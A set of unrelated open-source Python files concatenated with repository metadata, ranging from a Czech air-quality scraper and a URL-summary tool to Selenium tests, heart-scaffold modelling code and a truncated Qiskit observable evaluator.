html = scraperwiki.scrape(startingUrl)
soup = BeautifulSoup(html)
# Najdi první tabulku
table = soup.find("table")
trs = table.findAll("tr")
for tr in trs:
ths = tr.findAll("th")
tds = tr.findAll("td")
rowSignature = (len(tds), len(ths))
if rowSignature == (0, 9):
th = tr.find("th")
province = th.text.replace("Kraj: ", "")
th = th.findNext().text
date = reformatDate(th)
elif rowSignature == (0, 10):
pass
elif rowSignature == (10, 1):
pass
elif rowSignature == (11, 0):
td = tr.find("td")
identifier = td.find("a")
code = identifier.text
weatherStationUrl = urlparse.urljoin(startingUrl, identifier["href"])
latitude, longitude, altitude = scrapeWeatherStation(weatherStationUrl)
td = td.findNext().findNext()
name = td.text
td = td.findNext()
owner = td.text
td = td.findNext()
airquality = getEvaluation(td)
td = td.findNext("td")
SO2_1h = getEvaluation(td)
td = td.findNext("td")
NO2_1h = getEvaluation(td)
td = td.findNext("td")
CO_1h = getEvaluation(td)
td = td.findNext("td")
O3_1h = getEvaluation(td)
td = td.findNext("td")
PM10_1h = getEvaluation(td)
td = td.findNext("td").findNext("td")
PM10_24h = getEvaluation(td)
scraperwiki.datastore.save(["code"], {
"code" : code,
"name" : name,
"owner" : owner,
"province" : province,
"latitude" : latitude,
"longitude" : longitude,
"altitude" : altitude,
"time" : date,
"airquality" : airquality,
"SO2_1h" : SO2_1h,
"NO2_1h" : NO2_1h,
"CO_1h" : CO_1h,
"O3_1h" : O3_1h,
"PM10_1h" : PM10_1h,
"PM10_24h" : PM10_24h,
}, date = datetime.datetime(*map(int, re.split('[^\d]', date)[:-2])))
else:
raise Exception
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7b28757dca0e9585daaacf0aae60298e6545f140 | ebb63b057a82b8a10df305252cbcda4186ec02f7 | /taichi_blend/bundle-packages/melt/random_generator.py | b5cab4edc76ffef734527c01ec5d9bf5e01957b7 | [] | no_license | yjchoi1/taichi_blend | aa2d6f0129c8068b9a2c8bb5a7677b3c60923d5b | 907fdbee6027375324c9605ffc14db16e590f992 | refs/heads/master | 2023-03-21T12:31:04.126621 | 2021-03-01T15:06:13 | 2021-03-01T15:06:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from . import *
@A.register
class Def(IField):
'''
Name: random_generator
Category: sampler
Inputs: min:c max:c dim:i
Output: sample:f
'''
def __init__(self, min=0, max=1, dim=0):
self.min = min
self.max = max
self.dim = dim
@ti.func
def random(self):
return ti.random() * (self.max - self.min) + self.min
@ti.func
def _subscript(self, I):
if ti.static(self.dim == 0):
return self.random()
else:
return ti.Vector([self.random() for i in range(self.dim)])
| [
"1931127624@qq.com"
] | 1931127624@qq.com |
c430daf78308008c1535ac302c6886333d61e02f | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/010/handle_name.py | 6ce801becb568a35b0f0c7f0da87e9d3c2d3e015 | [] | no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28 | py | S = input()
print(S + 'pp') | [
"sososo1333@gmail.com"
] | sososo1333@gmail.com |
62bdf3e1d053de1b7c4bac023a257cd463d2a679 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/url_summary.py | 519893a361d74494357492e3d764243feefc29e2 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,826 | py | from collections import defaultdict
import random
from uuid import uuid4
from six.moves.urllib.parse import (
urlsplit, parse_qsl, ParseResult, urlunsplit, quote_plus)
from typing import Iterable
def get_summary(urls, top_items=20, top_urls=3, sample=True):
# type: (Iterable[str], int, int) -> UrlSummaryResult
""" Return a summary for given list or iterable of ``urls``.
``top_items`` (20 by default) controls how many top-level items to show,
and ``top_urls`` (3 by default) sets the number of random urls to show
for each top-level item.
Returns a UrlSummaryResult: a list subclass that has a nice
Jupyter Notebook display.
"""
index = defaultdict(list)
value_index = defaultdict(set)
for url in urls:
index['all', ''].append(url)
parsed = urlsplit(url) # type: ParseResult
index['netloc', format(parsed.netloc)].append(url)
path = parsed.path.rstrip('/').split('/')
for i in range(1, len(path)):
index['path start', '/'.join(path[: i + 1])].append(url)
for k, v in _parse_qsl(parsed.query or ''):
index['query key', '?{}'.format(k)].append(url)
value_index[k].add(v)
index['query key=value', '?{}={}'.format(k, v)].append(url)
items = sorted(index.items(), key=lambda x: (-len(x[1]), x[0]))
summary = []
for k, v in items[:top_items]:
stat = {'len': len(v), 'sample': sorted(_sample(v, top_urls, sample=sample))}
if k[0] == 'query key':
stat['len_v_set'] = len(value_index.get(k[1][1:]))
summary.append((k, stat))
return UrlSummaryResult(summary)
def _sample(lst, n, seed=42, sample=True):
if len(lst) <= n:
return lst
elif sample:
random.seed(seed)
return random.sample(lst, n)
else:
return lst[:n]
def _quote(s):
return quote_plus(s, safe='/')
def _parse_qsl(s):
return parse_qsl(s, keep_blank_values=True)
def _bold(x, bold=True):
return '<b style="color: black">{}</b>'.format(x) if bold else x
def _urlencode_quoted(x):
return '&'.join('{}={}'.format(k, v) for k, v in x)
class UrlSummaryResult(list):
def _repr_html_(self):
return '<ul>{}</ul>'.format(
'\n'.join(self._render_sample(field, value, stat)
for (field, value), stat in self))
def _render_sample(self, field, value, stat):
el_id = uuid4()
# Using "hidden" class defined by the Jupyter notebook
sample_elements = [self._render_url(url, field, value) for url in stat['sample']]
if stat['len'] > len(sample_elements):
sample_elements.append('…')
return '''\
<li>
<span href="#" style="cursor: pointer"
onclick="\
var el = document.getElementById('{id}'); \
this.getElementsByTagName('SPAN')[0].textContent = \
el.classList.contains('hidden') ? '▼' : '►'; \
el.classList.toggle('hidden')"
>{n:,} {field}: <b>{value}</b>{extra} <span>►</span></span>
<ul id="{id}" class="hidden" style="margin-top: 0">{sample}</ul>
</li>'''.format(
id=el_id,
n=stat['len'],
field=field,
value=value,
extra=(' ({len_v_set:,} unique values)'.format(**stat)
if 'len_v_set' in stat else ''),
sample='\n'.join('<li>{}</li>'.format(el) for el in sample_elements),
)
def _render_url(self, url, field, value):
return '<a href="{href}" target="_blank">{url}</a>'.format(
href=url, url=self._highlight(url, field, value))
def _highlight(self, url, field, value):
if field == 'all':
return url
parsed = urlsplit(url) # type: ParseResult
netloc = parsed.netloc
path = parsed.path
query = parsed.query
if field == 'netloc':
netloc = _bold(parsed.netloc)
elif field == 'path start':
s = len(value)
path = '{}{}'.format(_bold(parsed.path[1:s]), parsed.path[s:])
elif field == 'query key':
key_value = value[1:]
query = _urlencode_quoted(
[(_bold(_quote(k), k == key_value), _quote(v))
for k, v in _parse_qsl(query)])
elif field == 'query key=value':
key_value, value_value = value[1:].split('=', 1)
query = _urlencode_quoted(
[(_bold(_quote(k), bold), _bold(_quote(v), bold))
for bold, k, v in (
(k == key_value and v == value_value, k, v)
for k, v in _parse_qsl(query))])
return urlunsplit((parsed.scheme, netloc, path, query, parsed.fragment))
| [
"kostia.lopuhin@gmail.com"
] | kostia.lopuhin@gmail.com |
d65d0ea1045bd8d3db1d4f75a714ca11a80b322d | 3125e84d311b099935ca819aac36dd21ec165bc7 | /mapclientplugins/scaffolddatamapperstep/model/scaffoldmodel.py | 6ba7b7e983b5ad537868491c3e7363dd33b70e3f | [
"Apache-2.0"
] | permissive | tsalemink/mapclientplugins.scaffolddatamapperstep | e3af382759d2158e4257244d092c7d7716e15265 | 2f51dac59faab3bb386aa0998a8c55896c03c123 | refs/heads/master | 2023-03-15T18:43:02.308814 | 2019-07-23T20:12:01 | 2019-07-23T20:12:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,346 | py | from math import radians
from opencmiss.zinc.graphics import Graphics
from opencmiss.zinc.material import Material
from opencmiss.zinc.status import OK as ZINC_OK
from opencmiss.utils.maths import vectorops as maths
from ..utils import zincutils
class ScaffoldModel(object):
def __init__(self, region, material_module, file_path):
self._region = region
self._material_module = material_module
self._file_path = file_path
self._scaffold_coordinate_field = None
self._initialise_scene()
self._initialise_surface_material()
self._initialise_scaffold()
self._settings = dict(yaw=0.0, pitch=0.0, roll=0.0, X=0.0, Y=0.0, Z=0.0)
self._settings_change_callback = None
self._current_angle_value = [0., 0., 0.]
self._current_axis_value = [0., 0., 0.]
def reset_settings(self):
self._settings = dict(yaw=0.0, pitch=0.0, roll=0.0, X=0.0, Y=0.0, Z=0.0)
self._apply_callback()
def set_settings_change_callback(self, settings_change_callback):
self._settings_change_callback = settings_change_callback
def _apply_callback(self):
self._settings_change_callback()
def get_yaw_value(self):
return self._settings['yaw']
def get_pitch_value(self):
return self._settings['pitch']
def get_roll_value(self):
return self._settings['roll']
def get_X_value(self):
return self._settings['X']
def get_Y_value(self):
return self._settings['Y']
def get_Z_value(self):
return self._settings['Z']
def _create_surface_graphics(self):
fm = self._region.getFieldmodule()
fm.beginChange()
surface_right_atrium = self._scene.createGraphicsSurfaces()
surface_right_atrium.setCoordinateField(self._scaffold_coordinate_field)
surface_right_atrium.setSubgroupField(fm.findFieldByName('right atrium'))
surface_right_atrium.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
surface_material = self._material_module.findMaterialByName('right atrium')
surface_right_atrium.setMaterial(surface_material)
surface_right_atrium.setName('display_right_atrium_surfaces')
surface_left_atrium = self._scene.createGraphicsSurfaces()
surface_left_atrium.setCoordinateField(self._scaffold_coordinate_field)
surface_left_atrium.setSubgroupField(fm.findFieldByName('left atrium'))
surface_left_atrium.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
surface_material = self._material_module.findMaterialByName('left atrium')
surface_left_atrium.setMaterial(surface_material)
surface_left_atrium.setName('display_left_atrium_surfaces')
surface_right_ventricle = self._scene.createGraphicsSurfaces()
surface_right_ventricle.setCoordinateField(self._scaffold_coordinate_field)
surface_right_ventricle.setSubgroupField(fm.findFieldByName('right ventricle'))
surface_right_ventricle.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
surface_material = self._material_module.findMaterialByName('right ventricle')
surface_right_ventricle.setMaterial(surface_material)
surface_right_ventricle.setName('display_right_ventricle_surfaces')
surface_left_ventricle = self._scene.createGraphicsSurfaces()
surface_left_ventricle.setCoordinateField(self._scaffold_coordinate_field)
surface_left_ventricle.setSubgroupField(fm.findFieldByName('left ventricle'))
surface_left_ventricle.setRenderPolygonMode(Graphics.RENDER_POLYGON_MODE_SHADED)
surface_material = self._material_module.findMaterialByName('left ventricle')
surface_left_ventricle.setMaterial(surface_material)
surface_left_ventricle.setName('display_left_ventricle_surfaces')
fm.endChange()
return
def _create_line_graphics(self):
lines = self._scene.createGraphicsLines()
lines.setCoordinateField(self._scaffold_coordinate_field)
lines.setName('display_lines')
black = self._material_module.findMaterialByName('white')
lines.setMaterial(black)
return lines
def create_scaffold_graphics(self):
# self._create_line_graphics()
self._create_surface_graphics()
def _initialise_scene(self):
if self._region.getScene():
self._region.getScene().removeAllGraphics()
self._scene = self._region.getScene()
def get_scene(self):
if self._scene is not None:
return self._scene
else:
raise ValueError('Scaffold scene is not initialised.')
def _initialise_surface_material(self):
self._material_module.beginChange()
trans_blue = self._material_module.createMaterial()
trans_blue.setName('trans_blue')
trans_blue.setManaged(True)
trans_blue.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.0, 0.2, 0.6])
trans_blue.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.0, 0.7, 1.0])
trans_blue.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
trans_blue.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
trans_blue.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.3)
trans_blue.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
right_atrium = self._material_module.createMaterial()
right_atrium.setName('right atrium')
right_atrium.setManaged(True)
right_atrium.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.82, 0.45, 0.35])
right_atrium.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.82, 0.45, 0.35])
right_atrium.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
right_atrium.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
right_atrium.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
right_atrium.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
left_atrium = self._material_module.createMaterial()
left_atrium.setName('left atrium')
left_atrium.setManaged(True)
left_atrium.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.79, 0.42, 0.32])
left_atrium.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.79, 0.42, 0.32])
left_atrium.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
left_atrium.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
left_atrium.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
left_atrium.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
right_ventricle = self._material_module.createMaterial()
right_ventricle.setName('right ventricle')
right_ventricle.setManaged(True)
right_ventricle.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.71, 0.33, 0.22])
right_ventricle.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.71, 0.33, 0.22])
right_ventricle.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
right_ventricle.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
right_ventricle.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
right_ventricle.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
left_ventricle = self._material_module.createMaterial()
left_ventricle.setName('left ventricle')
left_ventricle.setManaged(True)
left_ventricle.setAttributeReal3(Material.ATTRIBUTE_AMBIENT, [0.59, 0.22, 0.05])
left_ventricle.setAttributeReal3(Material.ATTRIBUTE_DIFFUSE, [0.59, 0.22, 0.05])
left_ventricle.setAttributeReal3(Material.ATTRIBUTE_EMISSION, [0.0, 0.0, 0.0])
left_ventricle.setAttributeReal3(Material.ATTRIBUTE_SPECULAR, [0.1, 0.1, 0.1])
left_ventricle.setAttributeReal(Material.ATTRIBUTE_ALPHA, 0.7)
left_ventricle.setAttributeReal(Material.ATTRIBUTE_SHININESS, 0.2)
self._material_module.endChange()
return
def _initialise_scaffold(self):
result = self._region.readFile(self._file_path)
if result != ZINC_OK:
raise ValueError('Failed to initiate scaffold')
self._scaffold_coordinate_field = self._get_model_coordinate_field()
def _get_mesh(self):
fm = self._region.getFieldmodule()
for dimension in range(3, 0, -1):
mesh = fm.findMeshByDimension(dimension)
if mesh.getSize() > 0:
return mesh
raise ValueError('Model contains no mesh')
def _get_model_coordinate_field(self):
mesh = self._get_mesh()
element = mesh.createElementiterator().next()
if not element.isValid():
raise ValueError('Model contains no elements')
fm = self._region.getFieldmodule()
cache = fm.createFieldcache()
cache.setElement(element)
field_iter = fm.createFielditerator()
field = field_iter.next()
while field.isValid():
if field.isTypeCoordinate() and (field.getNumberOfComponents() <= 3):
if field.isDefinedAtLocation(cache):
return field
field = field_iter.next()
raise ValueError('Could not determine model coordinate field')
def rotate_scaffold(self, angle, value):
next_angle_value = value
if angle == 'yaw':
if next_angle_value > self._current_angle_value[0]:
angle_value = next_angle_value - self._current_angle_value[0]
else:
angle_value = -(self._current_angle_value[0] - next_angle_value)
euler_angles = [angle_value, 0., 0.]
self._current_angle_value[0] = next_angle_value
self._settings['yaw'] = next_angle_value
elif angle == 'pitch':
if next_angle_value > self._current_angle_value[1]:
angle_value = next_angle_value - self._current_angle_value[1]
else:
angle_value = -(self._current_angle_value[1] - next_angle_value)
euler_angles = [0., angle_value, 0.]
self._current_angle_value[1] = next_angle_value
self._settings['pitch'] = next_angle_value
else:
if next_angle_value > self._current_angle_value[2]:
angle_value = next_angle_value - self._current_angle_value[2]
else:
angle_value = -(self._current_angle_value[2] - next_angle_value)
euler_angles = [0., 0., angle_value]
self._current_angle_value[2] = next_angle_value
self._settings['roll'] = next_angle_value
angles = euler_angles
angles = [radians(x) for x in angles]
rotation = maths.eulerToRotationMatrix3(angles)
zincutils.transform_coordinates(self._scaffold_coordinate_field, rotation)
self._apply_callback()
def translate_scaffold(self, axis, value, rate):
next_axis_value = value * rate
if axis == 'X':
if next_axis_value > self._current_axis_value[0]:
axis_value = next_axis_value - self._current_axis_value[0]
else:
axis_value = -(self._current_axis_value[0] - next_axis_value)
new_coordinates = [axis_value, 0., 0.]
self._current_axis_value[0] = next_axis_value
self._settings['X'] = next_axis_value
elif axis == 'Y':
if next_axis_value > self._current_axis_value[1]:
axis_value = next_axis_value - self._current_axis_value[1]
else:
axis_value = -(self._current_axis_value[1] - next_axis_value)
new_coordinates = [0., axis_value, 0.]
self._current_axis_value[1] = next_axis_value
self._settings['Y'] = next_axis_value
else:
if next_axis_value > self._current_axis_value[2]:
axis_value = next_axis_value - self._current_axis_value[2]
else:
axis_value = -(self._current_axis_value[2] - next_axis_value)
new_coordinates = [0., 0., axis_value]
self._current_axis_value[2] = next_axis_value
self._settings['Z'] = next_axis_value
offset = new_coordinates
zincutils.offset_scaffold(self._scaffold_coordinate_field, offset)
self._apply_callback()
| [
"m.osanlouy@auckland.ac.nz"
] | m.osanlouy@auckland.ac.nz |
4620ec8b24a8b30d7078db3e41d39d5b8bd26563 | 449b3edf6ed1649f64f133533d6214f6679e6f2c | /customers/urls.py | 56177910b5e6f49a051e05a280b2230ab46e2888 | [
"MIT"
] | permissive | endonte/quotation2 | bbd82b0ab0ad524d19294e14bcc4752949cbbe03 | ddb9bf2f98ea8b45c9c43f272e61bb85fb563613 | refs/heads/master | 2021-01-15T14:19:36.476070 | 2017-08-21T07:20:07 | 2017-08-21T07:20:07 | 99,687,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.conf.urls import url
from .views import CustomerListView
urlpatterns = [
url(r'^$', CustomerListView.as_view(), name='customer_list'),
]
| [
"endonte88@gmail.com"
] | endonte88@gmail.com |
6885710c04ad189c6b12a2d576cb1720f585575d | 3ebed5d25b0f325736e435f03fb7cbf027a18da4 | /emc/memberArea/content/todo.py | e9aa77b5821b18022f4476034567cd627719d21f | [] | no_license | adam139/emc.memberArea | 82950eca452c781d0976d5f1c5c3140526f5823e | a549074240d780933cb590ce46c78bdecdbda654 | refs/heads/master | 2022-05-31T18:44:58.841750 | 2020-09-29T12:59:16 | 2020-09-29T12:59:16 | 47,908,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | #-*- coding: UTF-8 -*-
from plone.directives import form
class ITodo(form.Schema):
"""
emc project member area personal todo items container content type
"""
| [
"yuejun.tang@gmail.com"
] | yuejun.tang@gmail.com |
8eac734c22821c8104fc1c4200d29219a39df2d8 | 0c955ea058eae749695835b31d07f60775631f36 | /test_plots/test_patches.py | cbcab29018475b5a3089ff91f30d532cf115c260 | [
"BSD-3-Clause"
] | permissive | Ahmed/mpld3 | f75934ee5e0da196eb4440f19b54cbf9dab58d0c | edb9c82e1555b778adea932a55b51ca6dc3de6e4 | refs/heads/master | 2020-12-07T00:33:17.193173 | 2014-04-02T09:39:22 | 2014-04-02T09:39:22 | 18,023,559 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | """Plot to test patches"""
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
def main():
fig, ax = plt.subplots()
ax.grid(color='lightgray')
rcolor = lambda: np.random.random(3)
p = [patches.Arrow(0.75, 0.75, 0.5, 0.5),
patches.Circle((1, 2), 0.4),
patches.RegularPolygon((1, 3), 5, 0.4),
patches.Rectangle((1.6, 0.75), 0.8, 0.5),
patches.CirclePolygon((2, 2), 0.4),
patches.Polygon([[1.75, 3], [2, 3.25], [2.25, 3],
[2, 2.75], [1.75, 3]]),
patches.Wedge((3, 1), 0.4, 0, 270),
patches.Ellipse((3, 2), 0.6, 0.4),
patches.Arc((3, 3), 0.5, 0.5, 270, 90),
]
for patch in p:
patch.set_facecolor(rcolor())
patch.set_edgecolor(rcolor())
patch.set_alpha(0.5)
patch.set_linewidth(2)
ax.add_patch(patch)
# add a static patch
ax.add_patch(patches.Rectangle((0.3, 0.4), 0.4, 0.4,
fc='yellow', ec='black', alpha=0.3,
transform=ax.transAxes))
# make sure axes ratio is equal
ax.set_xlim(0.5, 0.5 + 3. * 4. / 3.)
ax.set_ylim(0.5, 3.5)
ax.set_title("Various Patches", size=16)
return fig
if __name__ == '__main__':
main()
plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
9e9053f992d74ab70ebb2bf5c40292d1251d11e6 | 60ff82c168f247728fa88ca8e748b61876d6b5c3 | /Chrome/GuestUser/ExploreCompaniesPage/TopSection/Test_SecondHeadline.py | bbf4c1031950ca663d8ae51e6b3461ec5d0fbfb5 | [] | no_license | mariana-rusu/the.muse | 2b9bee8a7740c3f305463cbfc28ebd3bacd49907 | 58434e3ad45795cb980aca8d6b5c67132b8a855c | refs/heads/master | 2021-01-12T07:33:04.831570 | 2017-01-09T21:02:52 | 2017-01-09T21:02:52 | 76,977,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | from selenium import webdriver
import unittest
import time
class SecondHeadline(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.maximize_window()
self.driver.get("https://www.themuse.com/")
time.sleep(1)
explore_companies = self.driver.find_element_by_xpath("/html/body/header/nav[2]/a[1]")
explore_companies.click()
def test_Headline_is_found(self):
driver = self.driver
assert (driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2"))
def test_Headline_text_is_found(self):
driver = self.driver
element = driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2")
self.assertEqual(element.text,"Browse offices before you apply.")
def tearDown(self):
self.driver.quit() | [
"mirabelia@yahoo.com"
] | mirabelia@yahoo.com |
95f800ba3a4d4c934ae6e706cea07edfc6d46be1 | e233f9bf52ad0f88416962edd957a3c866c19b78 | /reagent/test/base/horizon_test_base.py | 676c00c95aa0b12b78c937e5cb05f5420ff12268 | [
"BSD-3-Clause"
] | permissive | dwtcourses/ReAgent | 38c99dfe47adf1471620419f744cb4145f4f4151 | b9b54d4f30ff65cf1c54dc0cf90c938b48c44f90 | refs/heads/master | 2022-04-26T15:35:46.109984 | 2020-04-29T05:38:14 | 2020-04-29T05:40:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from reagent.tensorboardX import SummaryWriterContext
class HorizonTestBase(unittest.TestCase):
def setUp(self):
SummaryWriterContext._reset_globals()
def tearDown(self):
SummaryWriterContext._reset_globals()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
48ca418ae561d715421faaa683c95b01c751cfac | 7c5304c697f858147f5a6655eef814bc32872848 | /setup.py | 6d00328ae8f4d9c7e715cc77af03403589f75a1e | [
"MIT",
"BSD-2-Clause"
] | permissive | MadisKarli/pyJuliusAlign | 2d5e644363f20cbe1265bb183df79724e12963e4 | 2e2a9951e7599f5dc83a977bc6605c515afec253 | refs/heads/master | 2022-01-06T00:37:29.734312 | 2019-02-23T23:42:37 | 2019-02-23T23:42:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | #!/usr/bin/env python
# encoding: utf-8
'''
Created on Aug 29, 2014
@author: tmahrt
'''
from setuptools import setup
import io
setup(name='pyjuliusalign',
version='2.0.3',
author='Tim Mahrt',
author_email='timmahrt@gmail.com',
url='https://github.com/timmahrt/pyJuliusAlign',
package_dir={'pyjuliusalign': 'pyjuliusalign'},
packages=['pyjuliusalign'],
package_data={'pyjuliusalign': ["hiraganaChart.txt", "katakanaChart.txt"]},
license='LICENSE',
description='A helper library for doing forced-alignment in Japanese with Julius.',
long_description=io.open('README.md', 'r', encoding="utf-8").read(),
long_description_content_type='text/markdown',
)
| [
"timmahrt@gmail.com"
] | timmahrt@gmail.com |
dad36b398af2b8faf8d022d56955587525f59b3b | 1ba2b4a507783eb2051887b9ecbed85d87e4c16b | /qiskit/algorithms/aux_ops_evaluator.py | 9ce9349a7de8f236e92d1aadf7ead38d663f97ec | [
"Apache-2.0"
] | permissive | manoelmarques/qiskit-terra | 34a948605d98168b1344cee1fd6adc117a137f25 | 71dd7f7b9603e1991f9d97fef66bb9b63d552c91 | refs/heads/main | 2023-04-30T08:42:15.886082 | 2023-02-15T21:58:01 | 2023-02-15T21:58:01 | 228,042,086 | 0 | 0 | Apache-2.0 | 2019-12-14T15:07:03 | 2019-12-14T15:07:02 | null | UTF-8 | Python | false | false | 7,407 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Evaluator of auxiliary operators for algorithms."""
from typing import Tuple, Union, List
import numpy as np
from qiskit import QuantumCircuit
from qiskit.opflow import (
CircuitSampler,
ListOp,
StateFn,
OperatorBase,
ExpectationBase,
)
from qiskit.providers import Backend
from qiskit.quantum_info import Statevector
from qiskit.utils import QuantumInstance
from qiskit.utils.deprecation import deprecate_function
from .list_or_dict import ListOrDict
@deprecate_function(
"The eval_observables function has been superseded by the "
"qiskit.algorithms.observables_evaluator.estimate_observables function. "
"This function will be deprecated in a future release and subsequently "
"removed after that.",
category=PendingDeprecationWarning,
)
def eval_observables(
quantum_instance: Union[QuantumInstance, Backend],
quantum_state: Union[
Statevector,
QuantumCircuit,
OperatorBase,
],
observables: ListOrDict[OperatorBase],
expectation: ExpectationBase,
threshold: float = 1e-12,
) -> ListOrDict[Tuple[complex, complex]]:
"""
Pending deprecation: Accepts a list or a dictionary of operators and calculates
their expectation values - means
and standard deviations. They are calculated with respect to a quantum state provided. A user
can optionally provide a threshold value which filters mean values falling below the threshold.
This function has been superseded by the
:func:`qiskit.algorithms.observables_evaluator.eval_observables` function.
It will be deprecated in a future release and subsequently
removed after that.
Args:
quantum_instance: A quantum instance used for calculations.
quantum_state: An unparametrized quantum circuit representing a quantum state that
expectation values are computed against.
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
expectation: An instance of ExpectationBase which defines a method for calculating
expectation values.
threshold: A threshold value that defines which mean values should be neglected (helpful for
ignoring numerical instabilities close to 0).
Returns:
A list or a dictionary of tuples (mean, standard deviation).
Raises:
ValueError: If a ``quantum_state`` with free parameters is provided.
"""
if (
isinstance(
quantum_state, (QuantumCircuit, OperatorBase)
) # Statevector cannot be parametrized
and len(quantum_state.parameters) > 0
):
raise ValueError(
"A parametrized representation of a quantum_state was provided. It is not "
"allowed - it cannot have free parameters."
)
# Create new CircuitSampler to avoid breaking existing one's caches.
sampler = CircuitSampler(quantum_instance)
list_op = _prepare_list_op(quantum_state, observables)
observables_expect = expectation.convert(list_op)
observables_expect_sampled = sampler.convert(observables_expect)
# compute means
values = np.real(observables_expect_sampled.eval())
# compute standard deviations
std_devs = _compute_std_devs(
observables_expect_sampled, observables, expectation, quantum_instance
)
# Discard values below threshold
observables_means = values * (np.abs(values) > threshold)
# zip means and standard deviations into tuples
observables_results = list(zip(observables_means, std_devs))
# Return None eigenvalues for None operators if observables is a list.
# None operators are already dropped in compute_minimum_eigenvalue if observables is a dict.
return _prepare_result(observables_results, observables)
def _prepare_list_op(
quantum_state: Union[
Statevector,
QuantumCircuit,
OperatorBase,
],
observables: ListOrDict[OperatorBase],
) -> ListOp:
"""
Accepts a list or a dictionary of operators and converts them to a ``ListOp``.
Args:
quantum_state: An unparametrized quantum circuit representing a quantum state that
expectation values are computed against.
observables: A list or a dictionary of operators.
Returns:
A ``ListOp`` that includes all provided observables.
"""
if isinstance(observables, dict):
observables = list(observables.values())
if not isinstance(quantum_state, StateFn):
quantum_state = StateFn(quantum_state)
return ListOp([StateFn(obs, is_measurement=True).compose(quantum_state) for obs in observables])
def _prepare_result(
observables_results: List[Tuple[complex, complex]],
observables: ListOrDict[OperatorBase],
) -> ListOrDict[Tuple[complex, complex]]:
"""
Prepares a list or a dictionary of eigenvalues from ``observables_results`` and
``observables``.
Args:
observables_results: A list of of tuples (mean, standard deviation).
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
Returns:
A list or a dictionary of tuples (mean, standard deviation).
"""
if isinstance(observables, list):
observables_eigenvalues = [None] * len(observables)
key_value_iterator = enumerate(observables_results)
else:
observables_eigenvalues = {}
key_value_iterator = zip(observables.keys(), observables_results)
for key, value in key_value_iterator:
if observables[key] is not None:
observables_eigenvalues[key] = value
return observables_eigenvalues
def _compute_std_devs(
observables_expect_sampled: OperatorBase,
observables: ListOrDict[OperatorBase],
expectation: ExpectationBase,
quantum_instance: Union[QuantumInstance, Backend],
) -> List[complex]:
"""
Calculates a list of standard deviations from expectation values of observables provided.
Args:
observables_expect_sampled: Expected values of observables.
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
